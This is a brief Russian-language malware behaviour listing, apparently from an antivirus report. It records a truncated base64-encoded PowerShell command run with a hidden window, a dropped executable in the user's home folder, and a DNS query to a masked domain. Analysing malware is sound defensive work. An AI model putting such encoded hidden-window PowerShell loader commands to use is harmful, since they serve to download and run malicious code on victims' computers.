Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAUwB3AGkAeAB5AGgAYgBiAGkAdgBnAGgAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ASwBtAGsAdwBtAGkAZABzAHUAIAAjAD4AIAAkAEwAeQBwAGgAdABtAGsAcgA9ACcAUABmAHIAeA...
- %HOMEPATH%\397.exe
- DNS ASK ma###panda.com
- '%HOMEPATH%\397.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAAUwB3AGkAeAB5AGgAYgBiAGkAdgBnAGgAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ASwBtAGsAdwBtAGkAZABzAHUAIAAjAD4AIAAkAEwAeQBwAGgAdABtAGsAcgA9ACcAUABmAHIAeA...' (со скрытым окном)